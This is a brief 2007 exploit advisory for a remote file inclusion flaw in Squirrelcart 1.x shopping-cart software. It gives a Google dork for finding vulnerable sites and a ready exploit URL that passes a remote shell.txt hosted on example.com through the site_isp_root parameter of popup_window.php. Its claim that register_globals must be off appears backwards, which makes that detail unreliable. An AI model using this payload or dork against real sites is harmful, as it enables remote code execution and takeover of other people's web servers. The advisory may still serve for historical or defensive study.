Home / os / solaris

squirrelcart-rfi.txt

Posted on 20 August 2007

Title : Squirrelcart <= 1.x.x Remote File Inclusion URL : http://squirrelcart.com/ Google Dork : inurl:"/squirrelcart/" -squirrelcart.com Author : ShaiMagal Vulnerable file : popup_window.php ->* config.php*, line 13 - $site_isp_root = "blablabla"; Exploit : squirrelcart//popup_window.php?site_isp_root=http://example.com/shell.txt? notes : register_globals = off is needed it seems.

 

TOP